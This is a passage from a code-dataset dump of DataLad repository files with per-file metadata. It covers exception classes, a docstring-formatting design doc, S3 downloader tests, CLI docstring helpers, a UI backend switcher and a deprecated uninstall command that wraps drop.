self).__str__()\n return \"{}{}{}\".format(\n super_str,\n \". {} result(s)\".format(len(self.results)) if self.results else \"\",\n \". {} failed:{}{}\".format(\n len(self.failed),\n linesep,\n pformat(self.failed)) if self.failed else \"\")\n\n\nclass InstallFailedError(CommandError):\n \"\"\"Generic exception to raise whenever `install` command fails\"\"\"\n pass\n\n\nclass ConnectionOpenFailedError(CommandError):\n \"\"\"Exception to raise whenever opening a network connection fails\"\"\"\n pass\n#\n# Downloaders\n#\n\n\nclass DownloadError(Exception):\n\n def __init__(self, msg=None, status=None, **kwargs):\n super(DownloadError, self).__init__(msg, **kwargs)\n # store response status code\n self.status = status\n\n\nclass IncompleteDownloadError(DownloadError):\n pass\n\n\nclass UnaccountedDownloadError(IncompleteDownloadError):\n pass\n\n\nclass TargetFileAbsent(DownloadError):\n pass\n\n\nclass AccessDeniedError(DownloadError):\n def __init__(self, msg=None, supported_types=None, **kwargs):\n super(AccessDeniedError, self).__init__(msg, **kwargs)\n self.supported_types = supported_types\n\n\nclass AnonymousAccessDeniedError(AccessDeniedError):\n pass\n\n\nclass AccessPermissionExpiredError(AccessDeniedError):\n \"\"\"To raise when there is a belief that it is due to expiration of a credential\n\n which we might possibly be able to refresh, like in the case of CompositeCredential\n \"\"\"\n pass\n\n\nclass AccessFailedError(DownloadError):\n pass\n\n\nclass UnhandledRedirectError(DownloadError):\n def __init__(self, msg=None, url=None, **kwargs):\n super(UnhandledRedirectError, self).__init__(msg, **kwargs)\n self.url = url\n\n#\n# Crawler\n#\n\n\nclass CrawlerError(Exception):\n pass\n\n\nclass PipelineNotSpecifiedError(CrawlerError):\n pass\n\n\n#\n# Warnings\n#\n\nclass DataLadWarning(Warning):\n pass\n\n\n# We have an exception OutdatedExternalDependency, but it is intended for\n# an instance being raised. `warnings` module requires a class to be provided\n# as a category, so here is a dedicated Warning class\nclass OutdatedExternalDependencyWarning(DataLadWarning):\n \"\"\"Warning \"category\" to use to report about outdated\"\"\"\n pass\n" }, { "alpha_fraction": 0.7234323620796204, "alphanum_fraction": 0.7260726094245911, "avg_line_length": 34.23255920410156, "blob_id": "52d79deaa4d16b5d2d7da6c35319176006149f74", "content_id": "0dc6fc79b29011a712f6ff5cbb81181aafec3a28", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3030, "license_type": "permissive", "max_line_length": 274, "num_lines": 86, "path": "/docs/source/design/docstrings.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_docstrings:\n\n**********\nDocstrings\n**********\n\n.. topic:: Specification scope and status\n\n This specification provides a partial overview of the current\n implementation.\n\nDocstrings in DataLad source code are used and consumed in many ways. Besides\nserving as documentation directly in the sources, they are also transformed\nand rendered in various ways.\n\n- Command line ``--help`` output\n- Python's ``help()`` or IPython's ``?``\n- Manpages\n- Sphinx-rendered documentation for the Python API and the command line API\n\nA common source docstring is transformed, amended and tuned specifically for\neach consumption scenario.\n\n\nFormatting overview and guidelines\n==================================\n\nIn general, the docstring format follows the `NumPy standard <https://numpydoc.readthedocs.io/en/latest/format.html#docstring-standard>`_.\nIn addition, we follow the guidelines of `Restructured Text <https://docutils.sourceforge.io/docs/user/rst/quickstart.html>`_ with the additional features and treatments provided by `Sphinx <https://www.sphinx-doc.org/en/master>`_, and some custom formatting outlined below.\n\nVersion information\n-------------------\n\nAdditions, changes, or deprecation should be recorded in a docstring using the\nstandard Sphinx directives ``versionadded``, ``versionchanged``,\n``deprecated``::\n\n .. deprecated:: 0.16\n The ``dryrun||--dryrun`` option will be removed in a future release, use\n the renamed ``dry_run||--dry-run`` option instead.\n\n\nAPI-conditional docs\n--------------------\n\nThe ``CMD`` and ``PY`` macros can be used to selectively include documentation\nfor specific APIs only::\n\n options to pass to :command:`git init`. [PY: Options can be given as a list\n of command line arguments or as a GitPython-style option dictionary PY][CMD:\n Any argument specified after the destination path of the repository will be\n passed to git-init as-is CMD].\n\nFor API-alternative command and argument specifications the following format\ncan be used::\n\n ``<python-api>||<cmdline-api``\n\nwhere the double backticks are mandatory and ``<python-part>`` and\n``<cmdline-part>`` represent the respective argument specification for each\nAPI. In these specifications only valid argument/command names are allowed,\nplus a comma character to list multiples, and the dot character to include an\nellipsis::\n\n ``github_organization||-g,--github-organization``\n\n ``create_sibling_...||create-sibling-...``\n\n\nReflow text\n-----------\n\nWhen automatic transformations negatively affect the presentation of a\ndocstring due to excessive removal of content, leaving \"holes\", the ``REFLOW``\nmacro can be used to enclose such segments, in order to reformat them\nas the final processing step. Example::\n\n || REFLOW >>\n The API has been aligned with the some\n ``create_sibling_...||create-sibling-...`` commands of other GitHub-like\n services, such as GOGS, GIN, GitTea.<< REFLOW ||\n\nThe start macro must appear on a dedicated line.\n" }, { "alpha_fraction": 0.6613961458206177, "alphanum_fraction": 0.685824990272522, "avg_line_length": 41.30434799194336, "blob_id": "fd618753683c4a4c7474c56ecef59e3d40a61222", "content_id": "bdc895854899adedaf4c8bed48cb2f6a865d5e3e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12649, "license_type": "permissive", "max_line_length": 150, "num_lines": 299, "path": "/datalad/downloaders/tests/test_s3.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for S3 downloader\"\"\"\n\nimport os\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom ...downloaders.base import DownloadError\nfrom ...support import path as op\nfrom ...support.exceptions import AccessDeniedError\nfrom ...tests.utils_pytest import (\n SkipTest,\n assert_equal,\n assert_raises,\n integration,\n skip_if_no_module,\n skip_if_no_network,\n swallow_outputs,\n turtle,\n use_cassette,\n with_tempfile,\n with_testsui,\n)\nfrom ...utils import md5sum\nfrom ..providers import Providers # to test against crcns\nfrom ..s3 import (\n S3Authenticator,\n S3Downloader,\n)\nfrom .test_http import check_download_external_url\nfrom .utils import get_test_providers\n\nskip_if_no_module('boto')\nskip_if_no_network() # TODO: provide persistent vcr fixtures for the tests\n\nurl_2versions_nonversioned1 = 's3://datalad-test0-versioned/2versions-nonversioned1.txt'\nurl_2versions_nonversioned1_ver1 = url_2versions_nonversioned1 + '?versionId=null'\nurl_2versions_nonversioned1_ver2 = url_2versions_nonversioned1 + '?versionId=V4Dqhu0QTEtxmvoNkCHGrjVZVomR1Ryo'\nurl_1version_bucketwithdot = 's3://datalad.test1/version1.txt'\n\nurl_dandi1 = 's3://dandiarchive/dandiarchive/dandiarchive/data/d8dd3e2b-8f74-494b-9370-9e3a6c69e2b0.csv.gz?versionId=9P7aMTvTT5wynPBOtiQqkV.wvV8zcpLf'\n\n\n# disabled due to https://github.com/datalad/datalad/issues/7465\n# @use_cassette('test_s3_download_basic')\[email protected](\"url,success_str,failed_str\", [\n (url_2versions_nonversioned1, 'version2', 'version1'),\n (url_2versions_nonversioned1_ver2, 'version2', 'version1'),\n (url_2versions_nonversioned1_ver1, 'version1', 'version2'),\n (url_1version_bucketwithdot, 'version1', 'nothing'),\n])\ndef test_s3_download_basic(url, success_str, failed_str):\n check_download_external_url(url, failed_str, success_str)\n\n\n# TODO: redo smart way with mocking, to avoid unnecessary CPU waste\n@use_cassette('test_s3_mtime')\n@with_tempfile\ndef test_mtime(tempfile=None):\n url = url_2versions_nonversioned1_ver2\n with swallow_outputs():\n # without allow_old=False it might be reusing previous connection\n # which had already vcr tape for it, leading to failure.\n # TODO: make allow_old configurable and then within tests disallow\n # allow_old\n get_test_providers(url).download(url, path=tempfile, allow_old_session=False)\n assert_equal(os.stat(tempfile).st_mtime, 1446873817)\n\n # and if url is wrong\n url = 's3://datalad-test0-versioned/nonexisting'\n assert_raises(DownloadError, get_test_providers(url).download, url, path=tempfile, overwrite=True)\n\n\n@use_cassette('test_s3_reuse_session')\n@with_tempfile\n# forgot how to tell it not to change return value, so this side_effect beast now\[email protected](S3Authenticator, 'authenticate', side_effect=S3Authenticator.authenticate, autospec=True)\ndef test_reuse_session(tempfile=None, mocked_auth=None):\n Providers.reset_default_providers() # necessary for the testing below\n providers = get_test_providers(url_2versions_nonversioned1_ver1) # to check credentials\n with swallow_outputs():\n providers.download(url_2versions_nonversioned1_ver1, path=tempfile)\n assert_equal(mocked_auth.call_count, 1)\n\n providers2 = Providers.from_config_files()\n with swallow_outputs():\n providers2.download(url_2versions_nonversioned1_ver2, path=tempfile, overwrite=True)\n assert_equal(mocked_auth.call_count, 1)\n\n # but if we reload -- everything reloads and we need to authenticate again\n providers2 = Providers.from_config_files(reload=True)\n with swallow_outputs():\n providers2.download(url_2versions_nonversioned1_ver2, path=tempfile, overwrite=True)\n assert_equal(mocked_auth.call_count, 2)\n\n Providers.reset_default_providers() # necessary to avoid side-effects from having a vcr'ed connection\n # leaking through default provider's bucket, e.g. breaking test_mtime if ran after this one\n\n\ndef test_parse_url():\n from ..s3 import S3Downloader\n f = S3Downloader._parse_url\n b1 = \"s3://bucket.name/file/path?revision=123\"\n assert_equal(f(b1, bucket_only=True), 'bucket.name')\n assert_equal(f(b1), ('bucket.name', 'file/path', {'revision': '123'}))\n assert_equal(f(\"s3://b/f name\"), ('b', 'f name', {}))\n assert_equal(f(\"s3://b/f%20name\"), ('b', 'f name', {}))\n assert_equal(f(\"s3://b/f%2Bname\"), ('b', 'f+name', {}))\n assert_equal(f(\"s3://b/f%2bname?r=%20\"), ('b', 'f+name', {'r': '%20'}))\n\n\n@with_testsui(interactive=True)\ndef test_deny_access():\n downloader = S3Downloader(authenticator=S3Authenticator())\n\n def deny_access(*args, **kwargs):\n raise AccessDeniedError\n\n with assert_raises(DownloadError):\n with patch.object(downloader, '_download', deny_access):\n downloader.download(\"doesn't matter\")\n\n\n@with_tempfile\ndef test_boto_host_specification(tempfile=None):\n # This test relies on a yoh-specific set of credentials to access\n # s3://dandiarchive . Unfortunately it seems that boto (2.49.0-2.1) might\n # have difficulties to establish a proper connection and would blow\n # with\n # The authorization mechanism you have provided is not supported. Please use AWS4-HMAC-SHA256.\n # Some related discussions:\n # https://github.com/jschneier/django-storages/issues/28 which was closed\n # as superseded by a fix in 2017\n # https://github.com/jschneier/django-storages/issues/28 .\n # In my case I still needed to resort to the workaround of providing\n # host = 's3.us-east-2.amazonaws.com' to the call.\n #\n # Unfortunately I do not know yet how we could establish such tests without\n # demanding specific credentials. And since we overload HOME for the testing,\n # the only way to run/test this at least when testing on my laptop is:\n credfile = '/home/yoh/.config/datalad/providers/dandi.cfg'\n # Later TODO: manage to reproduce such situation with our dedicated test\n # bucket, and rely on datalad-test-s3 credential\n if not op.exists(credfile):\n raise SkipTest(\"Test can run only on yoh's setup\")\n providers = Providers.from_config_files([credfile])\n with swallow_outputs():\n providers.download(url_dandi1, path=tempfile)\n assert_equal(md5sum(tempfile), '97f4290b2d369816c052607923e372d4')\n\n\n# disabled due to https://github.com/datalad/datalad/issues/7464\ndef disabled_test_restricted_bucket_on_NDA():\n get_test_providers('s3://NDAR_Central_4/', reload=True) # to verify having credentials to access\n for url, success_str, failed_str in [\n (\"s3://NDAR_Central_4/submission_23075/README\", 'BIDS', 'error'),\n (\"s3://NDAR_Central_4/submission_23075/dataset_description.json\", 'DA041147', 'error'),\n ]:\n check_download_external_url(url, failed_str, success_str)\n\n\n# disabled due to https://github.com/datalad/datalad/issues/7464\n@use_cassette('test_download_multiple_NDA')\n@with_tempfile(mkdir=True)\ndef disabled_test_download_multiple_NDA(outdir=None):\n # This would smoke/integration test logic for composite credential testing expiration\n # of the token while reusing session from first url on the 2nd one\n urls = [\n \"s3://NDAR_Central_4/submission_23075/README\",\n \"s3://NDAR_Central_4/submission_23075/dataset_description.json\",\n ]\n providers = get_test_providers(urls[0], reload=True) # to verify having credentials to access\n\n for url in urls:\n ret = providers.download(url, outdir)\n\n\n# disabled due to https://github.com/datalad/datalad/issues/7465\n# @use_cassette('test_get_key')\[email protected](\"b,key,version_id\", [\n # disabled due to https://github.com/datalad/datalad/issues/7464\n # ('NDAR_Central_4', 'submission_23075/README', None),\n ('datalad-test0-versioned', '1version-nonversioned1.txt', None),\n ('datalad-test0-versioned', '3versions-allversioned.txt', None),\n ('datalad-test0-versioned', '3versions-allversioned.txt', 'pNsV5jJrnGATkmNrP8.i_xNH6CY4Mo5s'),\n])\ndef test_get_key(b, key, version_id):\n url = \"s3://%s/%s\" % (b, key)\n if version_id:\n url += '?versionId=' + version_id\n providers = get_test_providers(url, reload=True) # to verify having credentials to access\n downloader = providers.get_provider(url).get_downloader(url)\n downloader._establish_session(url)\n\n keys = [f(key, version_id=version_id)\n for f in (downloader._bucket.get_key,\n downloader._get_key_via_get)]\n # key1 != key2 probably due to some reasons, so we will just compare fields we care about\n for f in ['name', 'version_id', 'size', 'content_type', 'last_modified']:\n vals = [getattr(k, f) for k in keys]\n assert_equal(*vals, msg=\"%s differs between two keys: %s\" % (f, vals))\n\n\n# not really to be ran as part of the tests since it does\n# largely nothing but wait for token to expire!\n# It is still faster than waiting for real case to crash\n@turtle # over 900 sec since that is the min duration for token\n@integration\n@with_tempfile(mkdir=True)\ndef _test_expiring_token(outdir):\n url = \"s3://datalad-test0-versioned/1version-removed-recreated.txt\"\n outpath = op.join(outdir, \"output\")\n providers = get_test_providers(url, reload=True)\n downloader = providers.get_provider(url).get_downloader(url)\n\n from time import (\n sleep,\n time,\n )\n\n from datalad.downloaders.credentials import (\n AWS_S3,\n CompositeCredential,\n UserPassword,\n )\n from datalad.support.keyring_ import MemoryKeyring\n from datalad.tests.utils_pytest import ok_file_has_content\n credential = downloader.credential # AWS_S3('datalad-test-s3')\n\n # We will replace credential with a CompositeCredential which will\n # mint new token after expiration\n # crap -- duration must be no shorter than 900, i.e. 15 minutes --\n # too long to wait for a test!\n duration = 900\n\n generated = []\n def _gen_session_token(_, key_id=None, secret_id=None):\n from boto.sts.connection import STSConnection\n sts = STSConnection(aws_access_key_id=key_id,\n aws_secret_access_key=secret_id)\n # Note: without force_new=True it will not re-request a token and would\n # just return old one if not expired yet. Testing below might fail\n # if not entirely new\n token = sts.get_session_token(duration=duration, force_new=True)\n generated.append(token)\n return dict(key_id=token.access_key, secret_id=token.secret_key,\n session=token.session_token,\n expiration=token.expiration)\n\n class CustomS3(CompositeCredential):\n _CREDENTIAL_CLASSES = (UserPassword, AWS_S3)\n _CREDENTIAL_ADAPTERS = (_gen_session_token,)\n\n keyring = MemoryKeyring()\n downloader.credential = new_credential = CustomS3(\"testexpire\", keyring=keyring)\n # but reuse our existing credential for the first part:\n downloader.credential._credentials[0] = credential\n\n # now downloader must use the token generator\n assert not generated # since we have not called it yet\n\n # do it twice so we reuse session and test that we do not\n # re-mint a new token\n t0 = time() # not exactly when we generated, might be a bit racy?\n for i in range(2):\n downloader.download(url, outpath)\n ok_file_has_content(outpath, \"version1\")\n os.unlink(outpath)\n # but we should have asked for a new token only once\n assert len(generated) == 1\n assert downloader.credential is new_credential # we did not reset it\n\n # sleep for a while and now do a number of downloads during which\n # token should get refreshed etc\n\n # -3 since we have offset -2 hardcoded to refresh a bit ahead of time\n to_sleep = duration - (time() - t0) - 3\n print(\"Sleeping for %d seconds. Token should expire at %s\" %\n (to_sleep, generated[0].expiration))\n sleep(to_sleep)\n\n for i in range(5):\n # should have not been regenerated yet\n # -2 is our hardcoded buffer\n if time() - t0 < duration - 2:\n assert len(generated) == 1\n downloader.download(url, outpath)\n ok_file_has_content(outpath, \"version1\")\n os.unlink(outpath)\n sleep(1)\n assert len(generated) == 2\n" }, { "alpha_fraction": 0.5669528841972351, "alphanum_fraction": 0.5746113061904907, "avg_line_length": 31.15671730041504, "blob_id": "ad22d0c2ec7b41fcc8d4392b0952817de4d97976", "content_id": "c60769bbd8883f379791317751adb243e60244d6", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4309, "license_type": "permissive", "max_line_length": 86, "num_lines": 134, "path": "/datalad/cli/interface.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"Utilities and definitions for DataLad command interfaces\"\"\"\n\n# TODO this should be a dochelper\nfrom datalad.interface.base import dedent_docstring\n\n# Some known extensions and their commands to suggest whenever lookup fails\n_known_extension_commands = {\n 'datalad-container': (\n 'containers-list', 'containers-remove', 'containers-add',\n 'containers-run'),\n 'datalad-crawler': ('crawl', 'crawl-init'),\n 'datalad-deprecated': (\n 'ls',\n 'metadata',\n 'search',\n 'aggregate-metadata',\n 'extract-metadata',\n ),\n 'datalad-neuroimaging': ('bids2scidata',)\n}\n\n_deprecated_commands = {\n 'add': \"save\",\n 'uninstall': 'drop',\n}\n\n\ndef get_cmd_ex(interface):\n \"\"\"Return the examples for the command defined by 'interface'.\n\n Parameters\n ----------\n interface : subclass of Interface\n \"\"\"\n from datalad.interface.base import build_example\n intf_ex = \"\\n\\n*Examples*\\n\\n\"\n for example in interface._examples_:\n intf_ex += build_example(example, api='cmdline')\n return intf_ex\n\n\ndef get_cmdline_command_name(intfspec):\n \"\"\"Given an interface specification return a cmdline command name\"\"\"\n if len(intfspec) > 2:\n name = intfspec[2]\n else:\n name = intfspec[0].split('.')[-1].replace('_', '-')\n return name\n\n\ndef alter_interface_docs_for_cmdline(docs):\n \"\"\"Apply modifications to interface docstrings for cmdline doc use.\"\"\"\n # central place to alter the impression of docstrings,\n # like removing Python API specific sections, and argument markup\n if not docs:\n return docs\n import re\n import textwrap\n\n docs = dedent_docstring(docs)\n # clean cmdline sections\n docs = re.sub(\n r'\\|\\| PYTHON \\>\\>.*?\\<\\< PYTHON \\|\\|',\n '',\n docs,\n flags=re.MULTILINE | re.DOTALL)\n # clean cmdline in-line bits\n docs = re.sub(\n r'\\[PY:\\s.*?\\sPY\\]',\n '',\n docs,\n flags=re.MULTILINE | re.DOTALL)\n docs = re.sub(\n r'\\[CMD:\\s(.*?)\\sCMD\\]',\n lambda match: match.group(1),\n docs,\n flags=re.MULTILINE | re.DOTALL)\n docs = re.sub(\n r'\\|\\| CMDLINE \\>\\>(.*?)\\<\\< CMDLINE \\|\\|',\n lambda match: match.group(1),\n docs,\n flags=re.MULTILINE | re.DOTALL)\n # remove :role:`...` RST markup for cmdline docs\n docs = re.sub(\n r':\\S+:`[^`]*`[\\\\]*',\n lambda match: ':'.join(match.group(0).split(':')[2:]).strip('`\\\\'),\n docs,\n flags=re.MULTILINE | re.DOTALL)\n # make the handbook doc references more accessible\n # the URL is a redirect configured at readthedocs\n docs = re.sub(\n r'(handbook:[0-9]-[0-9]*)',\n '\\\\1 (http://handbook.datalad.org/symbols)',\n docs)\n # remove None constraint. In general, `None` on the cmdline means don't\n # give option at all, but specifying `None` explicitly is practically\n # impossible\n docs = re.sub(\n r',\\sor\\svalue\\smust\\sbe\\s`None`',\n '',\n docs,\n flags=re.MULTILINE | re.DOTALL)\n # capitalize variables and remove backticks to uniformize with\n # argparse output\n docs = re.sub(\n r'([^`]+)`([a-zA-Z0-9_]+)`([^`]+)',\n lambda match: f'{match.group(1)}{match.group(2).upper()}{match.group(3)}',\n docs)\n # select only the cmdline alternative from argument specifications\n docs = re.sub(\n r'``([a-zA-Z0-9_,.]+)\\|\\|([a-zA-Z0-9-,.]+)``',\n lambda match: f'``{match.group(2)}``',\n docs)\n # clean up sphinx API refs\n docs = re.sub(\n r'\\~datalad\\.api\\.\\S*',\n lambda match: \"`{0}`\".format(match.group(0)[13:]),\n docs)\n # dedicated support for version markup\n docs = docs.replace('.. versionadded::', 'New in version')\n docs = docs.replace('.. versionchanged::', 'Changed in version')\n docs = docs.replace('.. deprecated::', 'Deprecated in version')\n # Remove RST paragraph markup\n docs = re.sub(\n r'^.. \\S+::',\n lambda match: match.group(0)[3:-2].upper(),\n docs,\n flags=re.MULTILINE)\n docs = re.sub(\n r'^([ ]*)\\|\\| REFLOW \\>\\>\\n(.*?)\\<\\< REFLOW \\|\\|',\n lambda match: textwrap.fill(match.group(2), subsequent_indent=match.group(1)),\n docs,\n flags=re.MULTILINE | re.DOTALL)\n return docs\n" }, { "alpha_fraction": 0.5704168081283569, "alphanum_fraction": 0.57259601354599, "avg_line_length": 31.776784896850586, "blob_id": "c20915a06600621436401b562b815593e13b1c34", "content_id": "72c7790a93cebb3fb2fb806413fc582821f20c26", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3671, "license_type": "permissive", "max_line_length": 87, "num_lines": 112, "path": "/datalad/ui/__init__.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Interactive User Interface (as Dialog/GUI/etc) support\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom logging import getLogger\nlgr = getLogger('datalad.ui')\n\nlgr.log(5, \"Starting importing ui\")\n\nfrom .dialog import (\n ConsoleLog,\n DialogUI,\n IPythonUI,\n UnderAnnexUI,\n UnderTestsUI,\n SilentConsoleLog,\n QuietConsoleLog,\n)\nfrom ..utils import (\n is_interactive,\n get_ipython_shell,\n)\n\nKNOWN_BACKENDS = {\n 'console': ConsoleLog,\n 'dialog': DialogUI,\n 'ipython': IPythonUI,\n 'annex': UnderAnnexUI,\n 'tests': UnderTestsUI,\n 'tests-noninteractive': QuietConsoleLog,\n 'no-progress': SilentConsoleLog,\n}\n\n\n# TODO: implement logic on selection of the ui based on the cfg and environment\n# e.g. we cannot use DialogUI if session is not interactive\n# TODO: GitAnnexUI where interactive queries (such as question) should get to the\n# user by proxying some other appropriate (cmdline or GUI) UI, while others, such\n# as reporting on progress etc -- should get back to the annex\n\n\n# TODO: singleton\nclass _UI_Switcher(object):\n \"\"\"\n Poor man helper to switch between different backends at run-time.\n \"\"\"\n def __init__(self, backend=None):\n self._backend = None\n self._ui = None\n self.set_backend(backend)\n\n def set_backend(self, backend):\n if backend and (backend == self._backend):\n lgr.debug(\"not changing backend since the same %s\", backend)\n return\n if backend is None:\n # Might be IPython\n ipython_shell = get_ipython_shell()\n if ipython_shell:\n # Good old ipython would have TerminalInteractiveShell\n if ipython_shell.__class__.__name__ in ('ZMQInteractiveShell',):\n backend = 'ipython'\n # well -- this will not even be printed yet since unlikely\n # the lgr handlers were set already\n lgr.info(\n \"Detected IPython session. Setting UI backend to %r. \"\n \"If this is not a web IPython notebook session, you \"\n \"might like to datalad.ui.ui.set_backend('dialog'). \"\n \"Other known UI backends: %s\",\n backend, ', '.join(KNOWN_BACKENDS))\n else:\n backend = 'dialog'\n else:\n backend = 'dialog' if is_interactive() else 'no-progress'\n self._ui = KNOWN_BACKENDS[backend]()\n lgr.debug(\"UI set to %s\", self._ui)\n self._backend = backend\n\n @property\n def backend(self):\n return self._backend\n\n @property\n def ui(self):\n return self._ui\n\n # Delegate other methods to the actual UI\n def __getattribute__(self, key):\n if key.startswith('_') or key in {'set_backend', 'backend', 'ui'}:\n return super(_UI_Switcher, self).__getattribute__(key)\n return getattr(self._ui, key)\n\n def __setattr__(self, key, value):\n if key.startswith('_') or key in {'set_backend', 'backend', 'ui'}:\n return super(_UI_Switcher, self).__setattr__(key, value)\n return setattr(self._ui, key, value)\n\nlgr.log(5, \"Initiating UI switcher\")\n\nui = _UI_Switcher()\n\nlgr.log(5, \"Done importing ui\")\n" }, { "alpha_fraction": 0.5693690180778503, "alphanum_fraction": 0.5703051686286926, "avg_line_length": 33.019107818603516, "blob_id": "692922d7307daacd450297d0738a8cc4851be9c9", "content_id": "06914b5b8510b57eb7b26d79a14278b87f54b056", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5341, "license_type": "permissive", "max_line_length": 87, "num_lines": 157, "path": "/datalad/distribution/uninstall.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Thin shim around drop to preserve some backward-compatibility\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\n\nfrom datalad.support.param import Parameter\nfrom datalad.support.constraints import (\n EnsureStr,\n EnsureNone,\n)\nfrom datalad.distribution.dataset import (\n datasetmethod,\n require_dataset,\n Dataset,\n EnsureDataset,\n)\nfrom datalad.interface.base import Interface\nfrom datalad.interface.common_opts import (\n if_dirty_opt,\n recursion_flag,\n)\nfrom datalad.interface.utils import handle_dirty_dataset\nfrom datalad.interface.results import get_status_dict\nfrom datalad.interface.base import (\n build_doc,\n eval_results,\n)\nfrom datalad.utils import (\n ensure_list,\n)\nfrom datalad.core.local.status import get_paths_by_ds\n\n\nlgr = logging.getLogger('datalad.distribution.uninstall')\n\ndataset_argument = Parameter(\n args=(\"-d\", \"--dataset\"),\n metavar=\"DATASET\",\n doc=\"\"\"specify the dataset to perform the operation on.\n If no dataset is given, an attempt is made to identify a dataset\n based on the `path` given\"\"\",\n constraints=EnsureDataset() | EnsureNone())\n\n\ncheck_argument = Parameter(\n args=(\"--nocheck\",),\n doc=\"\"\"whether to perform checks to assure the configured minimum\n number (remote) source for data.[CMD: Give this\n option to skip checks CMD]\"\"\",\n action=\"store_false\",\n dest='check')\n\n\n@build_doc\nclass Uninstall(Interface):\n \"\"\"DEPRECATED: use the `drop` command\"\"\"\n _action = 'uninstall'\n\n _params_ = dict(\n dataset=dataset_argument,\n path=Parameter(\n args=(\"path\",),\n metavar=\"PATH\",\n doc=\"path/name of the component to be uninstalled\",\n nargs=\"*\",\n constraints=EnsureStr() | EnsureNone()),\n recursive=recursion_flag,\n check=check_argument,\n if_dirty=if_dirty_opt,\n )\n\n @staticmethod\n @datasetmethod(name=_action)\n @eval_results\n def __call__(\n path=None,\n *,\n dataset=None,\n recursive=False,\n check=True,\n if_dirty='save-before'):\n # all this command does is to map legacy call to their replacement\n # with drop()\n import warnings\n warnings.warn(\n \"The `uninstall` command is deprecated and will be removed in \"\n \"a future release. \"\n \"Use the `drop` command for safer operation instead.\",\n DeprecationWarning)\n\n reckless = None\n if not check:\n # the old uninstall/drop combo had no checks beyond git-annex\n # key copy redundancy\n reckless = 'kill'\n\n paths_by_ds = None\n if (reckless == 'kill' and not recursive) or if_dirty != 'ignore':\n refds = require_dataset(dataset, check_installed=True,\n purpose='uninstall')\n # same path resolution that drop will do\n paths_by_ds, errors = get_paths_by_ds(\n refds, dataset, ensure_list(path),\n subdsroot_mode='sub')\n\n if reckless == 'kill' and not recursive:\n # drop requires recursive with kill\n # check check of the subdatasets to see if it is safe to enable it\n if all(not len(Dataset(d).subdatasets(\n state='absent',\n result_xfm='paths',\n return_type='list',\n result_renderer='disabled'))\n for d in paths_by_ds.keys()):\n # no dataset has any subdatasets, this is fine to set\n recursive = True\n # it has never made sense, but for \"compatibility\" reasons, and to keep\n # the \"old\" implementation slower, even it uses the new implementation\n if if_dirty != 'ignore':\n for d in paths_by_ds.keys():\n handle_dirty_dataset(Dataset(d), mode=if_dirty)\n\n from datalad.api import drop\n lgr.debug(\n \"Calling \"\n \"drop(dataset=%r, path=%r, recursive=%r, what='all', reckless=%r)\",\n dataset, path, recursive, reckless)\n for res in drop(\n path=path,\n dataset=dataset,\n recursive=recursive,\n what='all',\n reckless=reckless,\n return_type='generator',\n result_renderer='disabled',\n # we need to delegate the decision making to this uninstall shim\n on_failure='ignore'):\n if res['status'] == 'error':\n msg, *rest = res[\"message\"]\n if isinstance(msg, str) and \"--reckless availability\" in msg:\n # Avoid confusing datalad-uninstall callers with the new\n # drop parametrization while uninstall still exists.\n msg = msg.replace(\"--reckless availability\", \"--nocheck\")\n res[\"message\"] = (msg, *rest)\n yield res\n return\n" }, { "alpha_fraction": 0.5567468404769897, "alphanum_fraction": 0.5625, "avg_line_length": 31.683761596679688, "blob_id": "bbf218c9aa8c21b8c99efe48b57b7928a9f19aaa", "content_id": "87f34cb542b591bd1d68df0f91d046667e9a5759", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3824, "license_type": "permissive", "max_line_length": 94, "num_lines": 117, "path": "/datalad/__main__.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Helper to use datalad as a \"runnable\" module with -m 